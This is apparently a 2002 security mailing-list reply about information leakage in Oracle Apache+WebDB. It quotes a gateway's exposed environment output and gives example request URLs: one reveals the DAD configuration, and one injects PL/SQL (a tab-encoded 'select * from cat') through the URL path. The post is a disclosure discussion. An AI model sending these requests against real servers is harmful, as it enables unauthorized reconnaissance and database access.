Re: Correction - Oracle Apache+WebDB info leakege

From: Scalise, Marzio (marzioscaliseat_private)
Date: Mon Feb 04 2002 - 08:03:55 PST

    >While I was going through the Oracle Apache+WebDB vulnerability, I found
    >something else also
    >interesting, I don't know if anyone has posted this before, but here it
    goes
    >any way.

    >If you reques the following: http://>:<port>/pls/admin
    >The following info is displayed:
    >Sun, 3 Feb 2002 19:57:12 GMT
    >No DAD configuration Found
    >  DAD name:
    >  PROCEDURE  :
    >  URL        : http://>:<port>/pls/admin
    >  PARAMETERS :
    >  ===========
    >
    >  ENVIRONMENT:
    >  ============
    >    PLSQL_GATEWAY=WebDb
    >    GATEWAY_IVERSION=2
    >    SERVER_SOFTWARE=Apache/1.3.12 (Unix) ApacheJServ/1.1 mod_perl/1.22

    [CUT...]

    Hi
    Yes, Michal Zalewski has posted this bug.

    http://www.securityfocus.com/archive/1/153186

    There are 2 bug for Web DB.
    1) you can "view" the DAD configuration on the Database server:

    http://>/pls/<name_of_dad>/admin_/gateway.htm

    2) the oracle webdb accept a PL-SQL procedure on the web, for example if you
    write in the browser:

    http://>:<port>/pls/<name_of_dad>/select%09*%09from%09cat%01 the
    following info is displayed:

    ORA-06550 row 7
    PLS-00428 A INTO clause waited in this instruction .. (sorry i have webdb in
    italian and i translate word by word)
    PL/SQL: SQL statement ignored

    hope this help

     		Marzio Scalise
     		Information Risk Management

     		KPMG S.p.A.
     		pgp key is available at:
     		http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x606359A9

    privileged.
    It is intended solely for the addressee. Access to this email by
    anyone else is unauthorized.

    distribution or any action taken or omitted to be taken in reliance
    on it, is prohibited and may be unlawful. When addressed to
    our clients any opinions or advice contained in this email are
    subject to the terms and conditions expressed in the governing
    KPMG client engagement letter.